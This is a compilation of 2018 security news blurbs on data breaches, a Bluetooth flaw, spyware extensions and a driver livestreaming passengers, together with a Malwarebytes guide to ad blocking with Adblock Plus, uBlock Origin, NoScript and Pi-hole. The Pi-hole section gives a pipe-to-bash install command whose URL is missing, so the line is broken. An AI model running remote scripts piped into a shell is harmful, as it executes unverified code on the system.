In May this year, HackRead reported how an Israeli company Unimania was caught collecting personal, Facebook and browsing data of users through Android apps and Chrome extensions. Now, researchers have discovered another “spyware” campaign aiming at stealing personal data of users but this time it is far bigger than the one previously reported. Ad-blockers and security […]

This is a post from Read the original post: Popular Android/iOS Apps & Extensions Collecting “Highly Personal” User data

Smashing Security #088: PayPal’s Venmo app even makes your drug purchases public

Smashing Security #088: PayPal’s Venmo app even makes your drug purchases public

Websites still using HTTP are marked as “not secure” by Chrome, 85,000 Google employees haven’t been phished for a year, and if you’re buying drugs via PayPal’s Venom app you should say goodbye to privacy.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Scott Helme.

Putin’s Soccer Ball for Trump Had Transmitter Chip, Logo Indicates

Russian President Vladimir Putin's gift of a soccer ball to U.S. President Donald Trump last week set off a chorus of warnings -- some of them only half in jest -- that the World Cup souvenir could be bugged. Republican Senator Lindsey Graham even tweeted, "I'd check the soccer ball for listening devices and never allow it in the White House." It turns out they weren't entirely wrong. From a report: Markings on the ball indicate that it contained a chip with a tiny antenna that transmits to nearby phones. But rather than a spy device, the chip is an advertised feature of the Adidas AG ball. Photographs from the news conference in Helsinki, where Putin handed the ball to Trump, show it bore a logo for a near-field communication tag. During manufacturing, the NFC chip is placed inside the ball under that logo, which resembles the icon for a WiFi signal, according to the Adidas website. The chip allows fans to access player videos, competitions and other content by bringing their mobile devices close to the ball. The feature is included in the 2018 FIFA World Cup match ball that's sold on the Adidas website for $165 (reduced to $83 in the past week).

Read more of this story at Slashdot.

Update your devices: New Bluetooth flaw lets attackers monitor traffic

By Waqas

The Bluetooth flaw also opens door to a man-in-the-middle attack. The IT security researchers at Israel Institute of Technology have discovered a critical security vulnerability in some implementations of the Bluetooth standard in which not all the parameters involved are appropriately validated by the cryptographic algorithm. If the vulnerability is exploited it can allow a remote attacker within the range of […]

This is a post from Read the original post: Update your devices: New Bluetooth flaw lets attackers monitor traffic

Privacy pros gaining control of technology decision-making over IT

TrustArc and IAPP announced the results of new research that examined how privacy technology is bought and deployed to address privacy and data protection challenges. Surveying privacy professionals worldwide, the findings of the survey show that privacy management technology usage is on the rise across all regions and that privacy teams have significant influence on purchasing decisions for eight of the ten technology categories surveyed. “This global survey is critical in our efforts to better … More

The post Privacy pros gaining control of technology decision-making over IT appeared first on Help Net Security.

Uber driver recorded passengers & live-streamed videos on Twitch

By Carolina

What is shocking about this incident is that what the Uber driver did was legal under Missouri law. Jason Gargac, an Uber and Lyft driver from St Louis Missouri, USA recorded and live-streamed his passengers’ activities on the video-sharing website Twitch, without their consent and knowledge. The videos displayed activities of passengers in the vehicle including personal conversations […]

This is a post from Read the original post: Uber driver recorded passengers & live-streamed videos on Twitch

Exposed: 157 GB of sensitive data from Tesla, GM, Toyota & others

By Waqas

The IT security researchers at cyber resilience firm Upguard discovered a massive trove of highly sensitive data publically available to be accessed by anyone. The data belonged to hundreds of automotive giants including Tesla, Ford, Toyota, GM, Fiat, ThyssenKrupp, and Volkswagen – Thanks to a publically exposed server owned by Level One Robotics, a Canadian firm providing industrial automation services. The data […]

This is a post from Read the original post: Exposed: 157 GB of sensitive data from Tesla, GM, Toyota & others

Uber Bans Driver Who Secretly Livestreamed Hundreds of Passengers

Lauren Weinstein tipped us off to this story from Mashable: Hundreds of Uber and Lyft rides have been broadcast live on Twitch by driver Jason Gargac this year, St. Louis Post-Dispatch reported Saturday, all of them without the passengers' permission. Gargac, who goes by the name JustSmurf on Twitch, regularly records the interior of his car while working for Uber and Lyft with a camera in the front of the car, allowing viewers to see the faces of his passengers, illuminated by his (usually) purple lights, and hear everything they say. At no point does Gargac make passengers aware that they are being filmed or livestreamed. Due to Missouri's "one-party consent" law, in which only one party needs to agree to be recorded for it to be legal (in this case, Gargac is the consenting one), what Gargac is doing is perfectly legal. That doesn't mean it's not 100 percent creepy. Sometimes, to confirm who they are for their driver, the passengers say their full names. Not only that, Gargac has another video that shows the view out the front of his car so that people can see where he's driving, giving away the locations of some passengers' homes. All the while, viewers on Twitch are commenting about things like the quality of neighborhoods, what the passengers are talking about, and of course, women's looks. Gargac himself is openly judgmental about the women he picks up, commenting to his viewers about their appearances before they get in his car and making remarks after he drops them off. He also regularly talks about wanting to get more "content," meaning interesting people, and is open about the fact that he doesn't want passengers to know they are on camera. "I feel violated. I'm embarrassed," one passenger told the St. Louis Post-Dispatch. "We got in an Uber at 2 a.m. to be safe, and then I find out that because of that, everything I said in that car is online and people are watching me. It makes me sick." The offending driver announced today on Twitter that he's at least "getting rid of the stored vids." He calls this move "step #1 of trying to calm everyone down." Hours ago his Twitch feed was made inaccessible. Lyft and Twitch have not yet responded to Mashable's request for a comment. But Uber said they've (temporarily?) banned Gargac from accessing their app "while we evaluate his partnership with Uber."

Read more of this story at Slashdot.

Data breach: Millions of SingHealth users affected including Singapore’s PM

By Waqas

SingHealth, the largest health care institution in Singapore has suffered a massive data breach in which records of over 1.5 million patients who visited SingHealth’s polyclinics and clinics between from May 1, 2015, to July 4 this year – One of the victims of the breach is the Prime Minister of Singapore Lee Hsien Loong while prescription details of 160,000 patients including […]

This is a post from Read the original post: Data breach: Millions of SingHealth users affected including Singapore’s PM

Webroot Blog: Cyber News Rundown: Venmo Setting Airs Dirty Laundry

Reading Time: ~2 min.

Venmo’s Public Data Setting Shows All

Researchers recently uncovered just how much data is available through the Venmo API, successfully tracking routines, high-volume transactions from vendors, and even monitoring relationships. Because Venmo’s privacy settings are set to public by default, many users have unknowingly contributed to the immense collection of user data available for all to view. In addition to purchases, users can also leave a personalized note for the transaction, some of which range from drug references to more intimate allusions.

Spanish Telecom Suffers Major Data Breach

One of the world’s largest telecom providers fell victim to a data breach this week that could affect millions of Movistar customers. The breach allowed current customers to access the account of any other customer, simply by altering the alpha-numeric ID contained within the account URL. While parent company Telefonica was quick to resolve the issue, the communications giant could be forced to pay a fine upwards of 10 million EUR for not complying with new GDPR rules.

DDoS Attacks Target Gaming Publisher

Yesterday, Ubisoft announced via Twitter that they were in the process of mitigating a DDoS attack affecting many of their online gaming servers. At least three of Ubisoft’s largest titles were affected, leaving thousands of players unable to connect to online services. While Ubisoft has likely resumed normal activity, they are not the only gaming publisher to be the focus of these types of attacks. Blizzard Entertainment suffered a similar attack as recently as last week.

ProCare Health Under Fire for Patient Info Database

At least four companies handling the IT needs of the healthcare system in New Zealand have come forward to disclose an extremely large database containing of identifiable information (PII) for more than 800,000 patients. The database in question holds records for many thousands of patients, most of which were gathered without consent from patients, as the company has no direct dealings with them, but instead works with doctors to accumulate more data.  While having such a large volume of data in one place can be risky, the security measures should equal the value of the data itself, which is still under scrutiny.

South Korea No Longer Main Target of Magniber Ransomware

Researchers have noticed over the past few weeks a significant trend involving the Magniber ransomware variant branching out from its long-time focus on South Korea to other Asian countries. Additionally, the source code itself has been vastly improved and has begun using an older exploit for Internet Explorer that would allow Magniber to increase infection rates across unpatched systems.

The post Cyber News Rundown: Venmo Setting Airs Dirty Laundry appeared first on Webroot Blog.

Webroot Blog

How to block ads like a pro

In part one of this series, we had a look at a few reasons why you should be blocking online advertisements on your network and devices. From malvertising attacks and privacy-invading tracking systems to just being an outright annoyance, online ads and trackers are a nuisance that provides an attack vector for malware authors, compromise user security, and plainly, diminish the browsing experience.

In the second part of this series, we’ll cover a few of the common ad blocking utilities and how to best configure those tools for maximum effectiveness. We’ll take a look at tools that are easy enough to set up and run on mom’s computer, as well as a few tools that may require a bit more expertise. And later on, we’ll discuss a few tools that do a great job of blocking ads and protecting your privacy, but may require a shift in mindset before realizing the benefit. 

So, go grab your cup of Joe, sit back, and dive into the conclusion of “Everybody and their mother is blocking ads, so why aren’t you?”

A note about filter lists

You’ve read the reasons why it’s important to have a robust ad blocking policy on your network. You understand the risks that are posed by malvertising attacks and data-sucking exchange networks. You now want to configure ad blocking within your own network—but where do you start? Your first stop is to look at filter lists.

Several of the tools we’ll cover use sets of rules, known as filter lists, to help determine what should be blocked. These lists are created by individuals, open-source communities, and private organizations. Popular websites to obtain filter lists include the Adblock Plus subscription page and

Some filter lists can include specific, narrow qualifiers such as “coin miners,” while others are comprised of large subsets of data targeting multiple facets of advertising and tracking. Filter lists are also broken out into languages to help block ads in various regions.

When the browser requests a website, that site—and all the domains requested by that site—are checked against the filter list prior to being displayed. If a domain is on the filter list, then the ad blocker won’t allow the information to pass, effectively blocking the content. But, too many filter lists will result in too many look-ups. This results in a slowing of the browser and increased response times of websites. Users should be mindful when adding filters lists as to not add more than is required and not add duplicate lists.

Adblock Plus

The popular ad blocking extension made by Eyeo is the simplest and most popular of the tools we’ll cover—and it’s easy to see why. Adblock Plus has been blocking banner pop-ups, advertisements, and trackers for the last 12 years. The browser extension works in popular browsers such as Chromium, Mozilla, and Safari, and is easily configured to block a variety of threats. Adblock Plus runs with minimal interruption on PCs (and yes, this is actually configured on my mom’s PC). The company even has its own Adblock Plus browser that can be used on mobile devices (more on this later).

Though Adblock Plus works out-of-the-box without any other configurations needed, it’s best to dive into the settings to make a few adjustments.


After using one of the previous links to install Adblock Plus to your preferred browser, the options menu can be accessed by clicking the red ABP icon that appears at the top of the browser. From there, click the Options button at the bottom of the window.

Adblock Plus encourages publishers to join their Acceptable Ads program. The Acceptable Ads program allows publishers who adhere to a prescribed set of guidelines an opportunity to have their ads shown to users who are using Adblock Plus. While this feature has caused a bit of flak for the company, the subsequent creation of the Acceptable Ads Committee has helped create a dialogue surrounding responsible advertising.

While those things are fine and dandy for publishers, we’re looking to block advertisements, so let’s disable those “acceptable” ads.

Set up

From within the General tab of the Settings window, uncheck the option for Allow Acceptable Ads. This will also be a good time to enable the Privacy and Security settings for Block additional tracking and Block social media icons tracking. Both settings will help prevent trackers from harvesting information about your browsing session (since social media buttons are used to track user behavior).

The default filter lists are shown under the advanced tab. Adblock Plus comes pre-loaded with several popular lists, including: EasyList and Fanboy’s Social Block List.  Additional filters can be downloaded and installed from the Adblock Plus subscription page, but the default lists will sufficiently weigh function and convenience to provide a modest ad blocking experience.


That’s it! Just a few clicks are all that is required to get a baseline setup of Adblock Plus. Let’s test it out and see how it looks.

That’s pretty cool, huh? The advertisements in videos, articles, and search results are all removed. And because the ad content isn’t being displayed, the page response time is faster and the desired content is reduced to a smaller portion of the landscape. This reduces the time spent scrolling around the page.

Sometimes it doesn’t work

Though Adblock Plus works great to block ads on most websites, sometimes it may not. Ads may find their way onto the page, or notices may be shown advising to disable the ad blocker.

Indeed should the need arise, Adblock Plus is easy to disable simply by clicking the ABP logo and then clicking the check mark to disable/enable the service.

But this post is about blocking ads, not succumbing to the pressures of aggressive advertisers. And though it may be possible to configure Adblock Plus to block the majority of these ads and trackers, advanced users may prefer to use a solution which allows for more granularity and greater control over the page elements and individual page frames.

uBlock Origin

uBlock Origin, which is not to be confused with µBlock, is another browser-based plugin, which is available for both Chromium and Mozilla browsers. Like Adblock Plus, the product is widely popular and utilizes a variety of filter lists to help block advertisement and trackers. Unlike Adblock Plus, however, uBlock Origin is an open-source project, which helps to boost the popularity of the product and helps the company to remain free from the outside influence of advertisers and publishers.

Though uBlock Origin works well at its intended purpose, the product may not be suitable for all users due to the technical nature of the program and difficulty in navigating its user interface (UI). Some have complained about the increase in support cases due to the installation of the program from users who may not understand why their webpages don’t look the same. But for those who understand the advertising landscape and the potential for blocking ads to cause trouble, then uBlock Origin appears to be a preferred choice.


Installing uBlock Origin is an almost identical process to installing Adblock Plus. Just head over to the Mozilla Add-ons page, Chrome Web Store, or Safari extensions page to grab a free copy of the software, and click the buttons to install the extension.

After installing uBlock Origin, a red icon will appear in the top right of the browser window. Options can be configured from this icon. Though uBlock Origin works well in the default state, we’ll take a look at the settings and configurations and make a few changes to help block some of the previously missed elements.

Set up

Clicking the uBlock Origin icon will open the panel window. The big blue button can be used to easily turn uBlock Origin off and on. The settings icon looks like a slider bar and will open the settings dashboard.


After opening the uBlock Origin dashboard, users are presented with a window with various tabs. There aren’t any configuration changes required, and the only setting worth noting is I am an advanced user, which will be discussed later.

One area uBlock Origin stands out above the competition is the inclusion of various filter lists. These lists can be enabled and disabled as necessary to allow a quick mechanism to block ads and trackers, but also malware, scam sites, and other annoying website elements. Though the defaults are pretty good, we’re going to add a few more lists to improve the blocking capabilities.

In addition to the default lists, the following lists will also be enabled:

  • uBlock filers – Annoyances
  • Adblock Warning Removal List
  • Malvertising filter list by Disconnect
  • Spam404
  • Fanboy’s Annoyance List
  • Fanboy’s Social Blocking List
  • hpHosts Ad and tracking servers

Once all are enabled, click the Apply changes button to save the settings, and then the Update now button to update the lists.


uBlock Origin is configured to use most of the same filter lists as have been configured for Adblock Plus, so many of the same ads will be blocked as before. The inclusion of the additional filter lists will help to exclude some of the web elements that were previously remaining.

More difficult

Even with strict filtering, not all advertisements will be blocked. There are still videos that auto play from websites, or advertisements hosted on the visited site instead of from a known third-party advertiser. For these types of ads, it’s best to create custom rules to block the individual elements on the page.

Right-click the advertisement—or section of the page where the ad appears—and choose the block option. A window will appear allowing the rule to be previewed before creation. Click the create button, and the only thing we’re left watching is that video disappear!

Elements can also be blocked by clicking the uBlock Origin icon and using element zapper or element picker. The difference between these two is that the element zapper is temporary and only removes the element until the session is closed. Element picker adds the element code to the block list so that it will also be blocked on future visits.

This feature can be used to remove the empty element that remains on the previously examined page. Simply open uBlock Origin and click the Element Picker icon. Carefully select only the desired area of the page to be blocked. Be sure to use the preview option prior to creating the rule to ensure the block works as intended. After verifying, create the rule to remove the desired frame.


There is nothing worse than opening a bunch of tabs only to later find one of them playing video from a small screen sequestered to the corner of a window. Sure, these elements can be blocked on an individual basis, but technically savvy users may desire a blanket approach to prevention. For that, uBlock Origin offers script blocking.

uBlock Origin logs all script activity on a webpage for analysis. Looking at the information helps reveal the number of trackers and ad networks in use on a particular website.

To use the logger feature, open the uBlock Origin panel and click the Logger icon. The logger window will appear. Press the refresh button to start the logger and reload the page. Information about the website will be logged to the window.

The blocking of web scripts tends to leave some websites lacking in functionality or just plain unusable. Blocking scripts should be reserved for those who understand the complications to be expected. The problematic nature prompted uBlock Origin to hide the feature behind the setting titled I am an advanced user. To gain full access to the settings, users must click the link for required reading.

After enabling the setting and reading the document, new options will appear within the uBlock Origin dashboard. The new options give users the ability to block first- and third-party scripts, as well as set individual policies per website.

Group settings based off script source will be displayed on top (red section), while the websites being called will appear below (blue section).

The two columns to the right of the names are used to define global (left) and local (right) policies. The combination of the two columns allows for a varying mixture of blocking capabilities.

For example, uBlock Origin can be configured to block all third-party scripts and frames, but first-party scripts will be blocked ONLY on the local site, since blocking first-party scripts globally will lead to problems loading webpages elsewhere.

Changes can be previewed by clicking the refresh circle. After verifying the changes, save the settings by clicking the lock icon at the top of the screen.

The resulting effect is that the auto-playing news story has now disappeared from all webpages on this site.

Not only did this stop the video, but if we go back and look at the logger, we see that all of the third-party scripts that were previously allowed are now being blocked.

Blocking scripts is one of the most effective mechanisms to block ads and invisible trackers, but will lead to unintended results.  Those who are interested in experimenting with script blocking—and who find the uBlock Origin UI intimidating—may find solace in the simplicity of the next plugin on our list.

A note about scripts

Website scripts come in a variety of forms including JavaScript, Java, and Flash. These scripting languages are used for advertising and tracking, but also to make the internet function.

Videos and graphics may be produced with scripting code. Webpage content may also be generated using these languages. Comment sections and other social media content are produced with scripting languages. As a result, users should expect the following:

Blocking scripts by default WILL cause some websites to fail.

Blocking scripts by default WILL prevent some content from loading.

Users who decide to implement global script-blocking policies will need to be aware of the potential issues and how to resolve such issues when they occur. Having an understanding of the domain landscapes and being able to analyze the necessary domains to enable desired content will also be needed. Simply whitelisting all websites will negate the value of blocking scripts, so understanding the how-to and why is important.

NoScript Security Suite

NoScript is a browser-based plugin for Mozilla browsers only. There is an alternative for Chromium called ScriptSafe, and Safari users have JS Blocker. Both will work similarly.

NoScript provides an extra layer of protection by ensuring that scripting code such as Java, JavaScript, and Flash is only executed by trusted websites. Blocking scripting languages from running on untrusted websites will prevent ads, trackers, and other forms of undesirable activity from occurring.

In addition to blocking scripts, NoScript comes with a robust set of anti-cross-site-scripting (XSS) and clickjacking protections to help prevent malicious actions and undesirable redirects.

NoScript and other script blockers are recommended for advanced users who understand the risks.


The process is no different for NoScript than any other plugin. Jump over to the Mozilla Add-ons page and install the extension to the browser.

NoScript requires absolutely no setup and will begin working immediately after being installed. Unlike the other extensions we’ve covered, there is no way to disable NoScript. If users need to disable the plugin, it must be done through the Mozilla add-on configuration panel.

Using NoScript

Users may immediately notice a difference to their browsing experience after installing NoScript. Videos and gifs may not load correctly, content may not appear, or worse, pages may fail to load altogether. Though this sounds terrible, it’s easy to configure NoScript to your personal browsing needs.

The simple NoScript interface makes it easy to create exclusions and allow blocked content on either a temporary or permanent basis. Instead of settings and filter lists, NoScript simply uses a series of easy-to-understand buttons to control the content.

After NoScript has blocked content on a page, a numbered indicator will be shown on the NoScript icon. Click the icon to view the blocked domains.

This image shows elements being blocked on two domains. One of those would be a desired website; the other would be an ad network. Clicking the Trusted icon next to the desired website will allow scripts to run ONLY from that domain. Click the green refresh circle at the top to reload the page.

After allowing the root domain the privilege of running scripts, the website functionality may still be lacking. Additional domains may be shown after allowing the root domain, and some may need to be allowed before the content appears.

NoScript allows for temporarily allowing script execution from unknown domains. Simply click the Temp Trusted icon to allow code execution until the current session expires. Unfortunately, it may be a bit of trial-and-error to find the domain to allow before seeing the desired content.

Though not designated as an ad blocker, NoScript will block advertisements injected via third-party scripts. NoScript won’t remove the empty elements from the page, so a tool like uBlock Origin will still be required to de-clutter the page landscape.

NoScript comes with a list of already assigned permissions, but the list is not extensive. Users will need to configure the program for the websites they most frequent. If the desired website makes heavy use of third-party scripts and content, it will be necessary to individually allow all content-providing domains for the website to function as intended. Some websites make extensive use of outside content, so users may spend considerable time configuring permissions before streamlining the experience.

NoScript is a valuable tool in any security toolkit. Blocking scripts is an effective way to block malicious activity and unwanted content.  Users may have to overcome the steep configuration curve before recognizing the benefit of the tool, but those who do will be rewarded with a faster browsing experience and fewer online trackers compromising their online privacy.

A note about browsers

Browsers are the key to a successful ad blocking experience. Some browsers support the use of ad blocking extensions whereas others do not. This post has focused on ad blocking using the Mozilla Firefox browser. Though subjective, Firefox provides a better all-around ad blocking experience across platforms. In fact, our own extension blocks malicious sites and unwanted content on Firefox only. By using the same browser and plugins across machines, configurations and personal filter lists can be shared across devices. This reduces the configuration time on a per-machine basis and produces a similar web experience—regardless of device.

Though Google Chrome is an extremely popular browser, keep in mind that it is distributed freely by a company that makes a substantial portion of its annual revenue from advertising.

According to Statista, Google netted $95.38 billion dollars, or roughly 87 percent of its total revenue, through advertising. Not only is the company selling ad space on the network, but they also collect information about your browsing activity in order to give “contextually relevant suggestions” (a fancy way to say ads).

The Google Chrome Privacy Whitepaper and Chrome Privacy Policy provide plenty of information on Chrome’s collection capabilities, and is an eye-opening read for those concerned about data mining. Some concerning items are shown below with highlighting added for better clarity.

The United States Congress has also become interested in Internet tracking and has recently requested responses from both Google and Apple on user tracking practices.

Yes, other browsers will track your behavior, but the extent will be reduced when using an open-source browser without an advertising agenda. Those who may be interested in using an open-source browser, but are preferential towards the look and feel of Google Chrome, may be interested to experiment with the Chromium browser. Chromium is the open-source project behind Chrome and Opera, and functions almost identical to both—save for all the Google modifications.

Block ads on Android

After having used an ad blocked browser on mobile, returning to an ad-laced mobile Internet is more than just a diminishment of the user experience—rather, it’s a downright dreadful experience.

The mobile landscape is already limited in size by its design, yet publishers and website owners feel it necessary to inundate the screen with irrelevant content and banner ads. This renders the content from the main site barely viewable and forces many users to fumble through troublesome mechanisms simply to read an article.

Some may contend that it’s best to not click on the ads, but a better approach may simply be to get rid of the ads altogether. This will not only declutter the screen and remove the undesirable content, but also improve page response times and lessen the attack surface against devices.

As we’ve seen throughout this write-up, browser extensions have been key to a successful ad blocking experience—and mobile is no different.

All of the tools covered in this post are available on mobile devices. But due to restrictions in Google Chrome on Android, users of that browser will be unable to set up the necessary configurations.

Thus, users who wish to block ads on their Android device will be forced to look to other browsers to accomplish the goal.

One simple solution that even dear old Mom will be able to use is the Adblock Plus browser. This Firefox-based browser is built by the same team that produces the Adblock Plus extension and incorporates all of the blocking capabilities in a pre-packaged browser that is configured for a modest ad blocking experience.

Users wanting more control over the various elements and frames may wish to consider the jump over to Mozilla where all of the plugins and configurations that were discussed in this write-up can be used to block the ads and declutter the screen. Those who opt for the change will see that dreadful mobile experience replaced with an ad-free view of how the page was originally intended to appear.

Mobile browser plugins perform exactly like their desktop counterparts, and will sufficiently block advertisements, trackers, and scripts from your mobile devices. Blocking the content not only improves the mobile web experience, but also helps to conserve battery life, decreases data-usage and the response times of websites, and reduces the attack surface for online threats.

But with the abundance of mobile devices, setting up policies on individual devices may not be the most efficient way to block advertisements. If there are a number of devices under your control, what would be the most efficient manner to block ads across them? For this, the final tool on our list will fill the void.


Administrators of small businesses or moderate home networks who wish to engage in ad blocking practices without the concern of operating systems, browsers, and plugins may wish to implement a free and (moderately) simple network-based solution. For that need, we have Pi-hole.

Pi-hole is a Linux based, network-level advertising and tracker blocker that acts as a DNS sinkhole for blacklisted domains. This means that advertisements and trackers are blocked before making it into the network. This allows Pi-hole to block ads on not just computers and cell phones, but also smart TVs, third-party apps, and even streaming video services.

Like the other tools we’ve covered, Pi-hole uses filter lists to block undesirable content. The Pi-hole filter list is compiled from various third-party sources into a single list. As such, there will be overlap between the lists used between Pi-hole and other ad blockers like uBlock Origin and Adblock Plus.

Pi-hole has been designed to work seamlessly on single board computers, such as Raspberry Pi, but can just as easily function on other Linux machines or cloud-based implementations.

Although not all Pi-hole installations can be as pretty as the above setup, having a dedicated Linux machine to act as the DNS server will be a necessary requirement.

Set up

After having a device to configure Pi-hole, setup is easy and straightforward. The command to install Pi-hole is as simple as:

curl -sSL | bash

Privacy-conscious users may wish to consider using the Cloudflare DNS for the upstream DNS provider. This privacy-focused DNS provider offers a fast and reliable lookup (except for the time it wasn’t). The address is:

After configuring your router DHCP options to force clients to use Pi-hole as the primary DNS server, setup will be complete.

The web-based panel can then be accessed by typing: http:/pi.hole/admin in your browser. The panel will give overall statistics regarding the number of blocked ads, number of DNS queries, and percentages of blocked traffic. Custom whitelists and blacklists can be configured using the tabs on the left.


Now that it’s all set up, we can have a look to see how well Pi-hole blocks the content.

As you can see, Pi-hole does a good job of removing the ads from this page. None of the ads remain, and only a few web elements are left behind. Using the Block Element feature in uBlock Origin or AdBlock Plus (not covered) will clear those unnecessary elements from the page.

And though Pi-hole works great to block ads at the network level and for all devices, users may still be required to configure a per-device ad blocking policy in order to protect laptops and mobile devices when not under the protection of the Pi-hole DNS sinkhole. Pain though this may be, Pi-hole makes an excellent addition to any ad blocking arsenal. The benefits of blocking ads throughout your environment and across streaming platforms outweigh the duplication efforts involved.

A final note

In preparation for this article, I spoke with a number of friends and colleagues regarding their ad blocking preferences. Despite the fact that we are all in security and all read and share the same information, few of us block (or view) online advertisements and trackers the same way.

What I’ve come to realize is ad blocking is often reflective of one’s personal experiences and perception of online threats. The level to which a person is willing to go to maintain personal security can depend on the level of tolerance and compromise that person is willing to extend in exchange for the belief that their activities are secure.

Case in point: Some colleagues block advertisements from third-party advertisers due to security concerns, but those same people may allow suggestions from their search provider on the notion that ads from reputable vendors don’t pose the same risk. Others may be adamant about blocking ads on their network as to not compromise proprietary information, but will tolerate ads on their mobile device as to not interfere with mobile browsing functionality.

A few take a hard-line approach and block as much as possible, which can render websites inoperable, while a majority are willing to compromise in exchange for a more user-friendly experience.

Though this article takes the position that all advertisements should be blocked, not everyone will agree. Some see the benefit in online advertising. Others may agree about blocking advertising content, but disagree with the methodology used in this post.

In a nutshell, there is no right or wrong way to block advertisements and trackers, and there seems to be little consensus regarding the most effective manner in which to do so.

Therefore, those wishing to configure an ad blocking policy within their environment will be encouraged to experiment with various products and methods to find what works best for their needs.

Block ads like a pro!

You’ve read this post and are hopefully coming away with the knowledge of why it’s important to block ads and the tools necessary to do so. But how should you set up your own network?

Of course, I can’t tell you that. You’ll have to come up with the system that best fits your needs, environment, and patience levels. But what I can tell you is how my personal setup is configured.

Desktop Mobile
Default Browser: Mozilla Firefox with ad blocking protections Default Browser: Mozilla Firefox with ad blocking protections
Secondary Browser(s): Chromium / Internet Explorer without protections Secondary Browser(s): Opera (currently, but this changes) no protections
Google Chrome: Rooted & Removed
Browser Extensions Browser Extensions
Adblock Plus: uBlock Origin:
Adblock Warning Removal List uBlock filters
Facebook annoyances blocker uBlockfilters – Badware risks
NoCoin Filter List uBlock filters – Privacy
uBlock Origin: uBlock filters – Resource abuse
uBlock filters uBlock filters – Unbreak
uBlockfilters – Badware risks Adguard Mobile Filters
uBlock filters – Privacy EasyList
uBlock filters – Resource abuse EasyPrivacy
uBlock filters – Unbreak Fanboy’s Enhanced Tracking List
EasyList Malware Domain List
EasyPrivacy Malware domains
Fanboy’s Enhanced Tracking List Peter Lowe’s Ad and tracking server list
Malware Domain List NoScript
Malware domains Decentraleyes (not covered)
Fanboy’s Annoyance List
Fanboy’s Anti-Third-party Social
Fanboy’s Cookiemonster List
Fanboy’s Social Blocking List
Peter Lowe’s Ad and tracking server list
Privacy Badger (not covered)
Decentraleyes (not covered)
  • Though not in my current setup, Ghostery deserves a shout-out. Users might consider giving it a try also.

These tools help to maintain a relatively ad-free experience, limit my exposure to privacy-invading trackers and online threats, and along with well-defined personal filter lists, help keep my favorite websites running smoothly and efficiently. Taken together (and considering the nifty calculation provided by uBlock), I’d estimate that anywhere from 18 to 33 percent of total traffic is blocked due to unwanted or unapproved content.

This concludes our series, “Everybody and their mother is blocking ads, so why aren’t you?”. We hope you are coming away with a better understanding of how online advertisements pose a threat to your online security and how trackers can jeopardize your personal privacy. You should now have the knowledge of why it’s important to block advertisements on your devices, and the know-how to create a robust and successful ad-blocking policy within your network and for your devices. Most importantly, we hope we’ve given you the tools and the empowerment to take back control of your browsing experience and to block ads in your own environment—just like the pros.

 This post reflects the opinion of the writer, serving as a review of the tools available to block online advertisements. Malwarebytes has no affiliations with and does not endorse any of the companies or tools listed in this write-up. 

The post How to block ads like a pro appeared first on Malwarebytes Labs.

Smashing Security #087: How Russia hacked the US election

Smashing Security #087: How Russia hacked the US election

Regardless of whether Donald Trump believes Russia hacked the Democrats in the run-up to the US Presidential election or not, we explain how they did it. And Carole explores some of the creepier things being done in the name of surveillance.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Robocall Firm Exposes Hundreds of Thousands of US Voters’ Records

An anonymous reader shares a report: RoboCent, a Virginia Beach-based political robocall firm, has exposed the personal details of hundreds of thousands of US voters, according to the findings of a security researcher who stumbled upon the company's database online. The researcher, Bob Diachenko of Kromtech Security, says he discovered the data using a recently launched online service called GrayhatWarfare that allows users to search publicly exposed Amazon Web Services data storage buckets. Such buckets should never be left exposed to public access, as they could hold sensitive data.

Read more of this story at Slashdot.

Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do

We are in the midst of a digital transformation. And yet, IT departments are struggling to develop a digital strategy that addresses data privacy and cybersecurity. In a world where the General Data Protection Regulation (GDPR) is now in effect, the lack of such a strategy could end up coming back to haunt your organization and its leadership.

The Greatest Challenge Facing Digital Strategy Leadership

According to a June 2018 Harvey Nash/KPMG CIO Survey, the greatest challenge facing security and information technology leadership is the ability to deliver dynamic data while simultaneously providing a high level of security and privacy.

Only 32 percent of organizations have a company-wide digital strategy, the same survey found, and of those, 78 percent admit that the strategy in place is moderately effective at best. These insights imply that all of the data transmitted through organizations, including the personal information of customers, isn’t getting the level of protection necessary or satisfying GDPR compliance.

Jumping Into the Digital Transformation Too Fast

Let’s face it, most companies are failing or falling behind when it comes to cybersecurity — and the ongoing digital transformation is only exacerbating the situation. The Harvey Nash/KPMG survey states IT departments are doing fine when it comes to traditional technologies, but it also recognizes the increasing complexity that digital technologies bring to organizations.

Understanding these technologies is part of the problem — not only how they work, but also how they’ll best improve the nature of the business. It might be tempting to apply the latest and greatest available technology, whether you need it or not.

IT staff are often risk-takers — they like new technology and want to use it right away. Where they run into trouble is bringing in the latest technology without a real strategy to implement it both wisely and securely. Just because IT wants to update its technology doesn’t mean the company is ready for it.

Too Much Data, Not Enough Security

Understanding how a technology’s abilities intersect (or don’t) with a business’s needs makes the difference between a successful transformation and digital nightmare. Whether the technology is a boon or bust for the company, there is one thing it is guaranteed to do: generate more data — which will require layers of security. Without an effective digital strategy, understanding and protecting that data becomes problematic.

If the data were stored in one location, it might be easier to manage. But with increasing diversity of technologies, from the Internet of Things (IoT) and cloud computing to blockchain and virtual reality (VR), databases for one company are stored in thousands of endpoints. This reality is leading to increased risk of data breaches.

“[W]ith the emergence of these transformative technologies the perimeter has become dynamic and ever-changing,” wrote Peter Galvin, chief strategy and marketing officer at Thales eSecurity. “[W]hile protecting the perimeter is still important, it simply is not enough to prevent sensitive data from being stolen.”

Getting Leadership on Board

A strong digital strategy will provide the layers of security and privacy needed in the digital transformation, but this requires cooperation from all levels of leadership. Just as IT departments have a responsibility to be more business-aware and recognize how new technologies fit (or don’t fit) into corporate strategies, boards of directors must be more realistic about creating digital strategies that will meet today’s and tomorrow’s privacy concerns.

In the past, the fallout from data breaches and other security incidents fell directly on C-suite employees: Chief executive officers (CEOs), chief information officers (CIOs) and chief information security officers (CISOs) have been held accountable by directors. However, the responsibility often falls on the board to approve budgets, support cybersecurity funding and efforts and create corporate strategies.

Thanks to GDPR — and rising security and privacy threats — boards may finally be getting the message. The Harvey Nash/KPMG survey found that boardrooms are increasingly prioritizing security. In fact, security has received the most significant increase in business priority over the past year.

And according to Board Effect, more boards are expanding to bring cybersecurity experts directly to the table as full members.

